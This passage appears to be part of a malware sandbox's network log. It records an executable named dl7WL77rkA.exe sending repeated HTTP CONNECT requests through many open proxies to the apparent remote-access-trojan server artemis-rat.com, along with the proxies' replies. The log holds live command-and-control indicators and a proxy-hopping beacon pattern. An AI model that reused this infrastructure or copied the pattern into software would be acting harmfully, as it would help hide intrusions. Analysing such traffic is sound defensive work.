                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.925318003 CET316INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:40 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            825192.168.2.55226838.242.251.177485863876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.771652937 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            826192.168.2.550807116.106.105.5510803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.771688938 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            827192.168.2.54994549.145.119.10280853876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.780327082 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:57.584580898 CET19INHTTP/1.1 200 OK


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            828192.168.2.552216171.244.140.160270203876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.789755106 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.701880932 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.108232975 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.796564102 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            829192.168.2.55155945.150.25.13280803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.789757013 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.811372042 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.811556101 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:52.905198097 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            830192.168.2.551801162.241.46.40494013876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.790402889 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.811368942 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            831192.168.2.55230472.206.181.12341453876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.791189909 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            832192.168.2.551632171.244.140.160623103876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.791192055 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.905066013 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            833192.168.2.55230598.175.31.19541453876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.791333914 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            834192.168.2.552301130.162.213.17531283876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.791459084 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.108472109 CET39INHTTP/1.1 200 Connection established


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            835192.168.2.55228151.89.173.40110583876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.791460037 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.592395067 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.499044895 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.405467987 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:48.093115091 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:51.905210018 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:55.592720032 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:02.904906034 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            836192.168.2.55233138.162.1.14331283876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.791687965 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.206218958 CET111INHTTP/1.1 407 Proxy Authentication Required
                                                                                                                                                                                                                                                            Proxy-Authenticate: Basic realm=""
                                                                                                                                                                                                                                                            Data Raw: 50 72 6f 78 79 20 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 52 65 71 75 69 72 65 64
                                                                                                                                                                                                                                                            Data Ascii: Proxy Authentication Required


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            837192.168.2.5522858.217.95.4488993876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.791781902 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.107789040 CET711INHTTP/1.1 502 Bad Gateway
                                                                                                                                                                                                                                                            Server: nginx/1.25.1
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:40 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 559
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 35 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>502 Bad Gateway</title></head><body><center><h1>502 Bad Gateway</h1></center><hr><center>nginx/1.25.1</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            838192.168.2.552227197.242.146.10931283876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.795893908 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.701843023 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:56.440448999 CET39INHTTP/1.1 200 Connection established


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            839192.168.2.55236938.162.10.14831283876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.815742016 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.250710011 CET111INHTTP/1.1 407 Proxy Authentication Required
                                                                                                                                                                                                                                                            Proxy-Authenticate: Basic realm=""
                                                                                                                                                                                                                                                            Data Raw: 50 72 6f 78 79 20 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 52 65 71 75 69 72 65 64
                                                                                                                                                                                                                                                            Data Ascii: Proxy Authentication Required


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            840192.168.2.55230798.170.57.24941453876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.815743923 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            841192.168.2.55235692.204.135.203108243876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.815937996 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.405045033 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.201900959 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.702075005 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.592792988 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:49.405349016 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            842192.168.2.550022192.99.207.129293603876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.830185890 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.939110994 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.083456993 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:53.217669964 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


